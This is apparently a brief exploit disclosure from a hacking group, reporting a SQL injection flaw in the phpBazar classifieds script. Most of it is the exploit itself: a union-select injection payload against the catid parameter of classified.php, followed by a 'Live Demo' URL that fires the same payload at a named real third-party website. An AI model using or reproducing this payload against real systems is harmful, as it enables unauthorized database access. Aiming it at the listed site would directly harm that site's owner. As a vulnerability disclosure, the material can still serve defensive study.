/*

Author          : MizoZ [from MA]
Group           : EvilWay, evilway[at]mail[dot]com
Email           : mizozx[at]gmail[dot]com

Greetz          : Zuka, Dyle !!

MABROOK L3IIIIIIIIIID

*/

The vulnerability is in the $_GET['cid'] , exploit :
[HOST]/[PATH]/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--

Live Demo :
http://toutsurlegoldenretriever.fr/phpBazar-2.1.1fix/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--